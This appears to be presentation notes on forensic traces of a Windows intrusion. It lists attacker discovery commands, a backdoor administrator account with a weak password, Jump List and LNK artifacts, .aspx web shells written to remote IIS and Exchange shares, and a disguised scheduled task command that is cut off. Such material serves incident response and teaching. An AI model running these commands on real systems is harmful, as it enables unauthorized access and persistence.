Presentation Reference

Discovery Commands net user net user win001 netstat -nao quser Persistence Create User net.exe user /add new.admin Password1! Add user to local administrators net.exe localgroup /add administrators new.admin Jump Lists Provide input for mini start menus %AppData%\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\9b9cdc69c1c24e2b.automaticDestinations-ms https://forensicswiki.xyz/wiki/index.php?title=List_of_Jump_List_IDs LNK Files Populate “Recent Items” directory %AppData%\Roaming\Microsoft\Windows\Recent\ OutlookCN.aspx.lnk %AppData%\Roaming\Microsoft\Windows\Recent\logon.aspx.lnk Lateral Movement Remote Web Shell Creation notepad.exe \\10.0.0.2\c$\inetpub\wwwroot\1.aspx notepad.exe \\10.0.0.2\c$\inetpub\wwwroot\1.aspx notepad.exe \\10.0.0.2\e$\webapps\PRD_PMO_JiraPM\1.aspx notepad.exe \\CORPCOMP\d$\Microsoft\Exchange\FrontEnd\HttpProxy\owa\auth\logon.aspx notepad.exe \\CORPCOMP\d$\Microsoft\Exchange\FrontEnd\HttpProxy\owa\auth\OutlookCN.aspx Remote Task Creation schtasks /Create /TN "\Microsoft\Windows\Server Managements" /sc ONCE /tr "cmd.